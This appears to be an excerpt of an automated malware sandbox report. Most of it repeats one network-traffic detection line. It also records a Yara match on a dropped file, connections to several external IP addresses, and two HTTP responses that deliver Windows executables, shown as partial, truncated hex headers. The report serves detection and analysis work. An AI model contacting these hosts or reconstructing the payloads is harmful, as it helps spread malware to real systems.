                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: Yara matchFile source: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmp, type: DROPPED
                                  Source: unknownNetwork traffic detected: DNS query count 31
                                  Source: global trafficTCP traffic: 192.168.2.5:49718 -> 95.142.47.11:1203
                                  Source: global trafficTCP traffic: 192.168.2.5:50183 -> 195.154.62.146:8080
                                  Source: global trafficTCP traffic: 192.168.2.5:50184 -> 212.83.158.215:8080
                                  Source: global trafficTCP traffic: 192.168.2.5:50185 -> 62.210.9.152:8080
                                  Source: global trafficTCP traffic: 192.168.2.5:50245 -> 77.105.136.3:81
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.10.0 (Ubuntu)Date: Wed, 06 Dec 2023 13:33:21 GMTContent-Type: application/octet-streamContent-Length: 4724720Last-Modified: Mon, 24 Jul 2023 06:14:10 GMTConnection: keep-aliveETag: "64be16b2-4817f0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 e7 ac 00 92 86 c2 53 92 86 c2 53 92 86 c2 53 41 f4 c1 52 9f 86 c2 53 41 f4 c7 52 2b 86 c2 53 41 f4 c4 52 93 86 c2 53 f0 fe c6 52 81 86 c2 53 f0 fe c1 52 8a 86 c2 53 f0 fe c7 52 fa 86 c2 53 41 f4 c6 52 88 86 c2 53 41 f4 c3 52 91 86 c2 53 41 f4 c5 52 93 86 c2 53 92 86 c3 53 4f 84 c2 53 12 ff cb 52 df 87 c2 53 12 ff 3d 53 93 86 c2 53 92 86 55 53 93 86 c2 53 12 ff c0 52 93 86 c2 53 52 69 63 68 92 86 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 fb 67 62 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 1f 00 ae 21 00 00 ee 0d 00 00 00 00 00 44 9e 19 00 00 10 00 00 00 c0 21 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 27 f7 48 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 19 2a 00 28 00 00 00 00 c0 2a 00 c0 bc 02 00 00 00 00 00 00 00 00 00 78 fc 47 00 78 1b 00 00 00 80 2d 00 18 5b 02 00 18 ab 24 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ab 24 00 18 00 00 00 a8 df 21 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 00 cc 02 00 00 18 ed 29 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f ad 21 00 00 10 00 00 00 ae 21 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 69 08 00 00 c0 21 00 00 6a 08 00 00 b2 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 8b 00 00 00 30 2a 00 00 6a 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 bc 02 00 00 c0 2a 00 00 be 02 00 00 86 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 5b 02 00 00 80 2d 00 00 5c 02 00 00 44 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Wed, 06 Dec 2023 13:33:45 GMTContent-Type: application/x-msdos-programContent-Length: 1247744Connection: keep-aliveVary: User-AgentLast-Modified: Sat, 02 Dec 2023 03:41:44 GMTETag: "130a00-60b7ea9eab3a0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 a7 6a 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 5a 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 13 00 00 04 00 00 bb ab 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 24 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 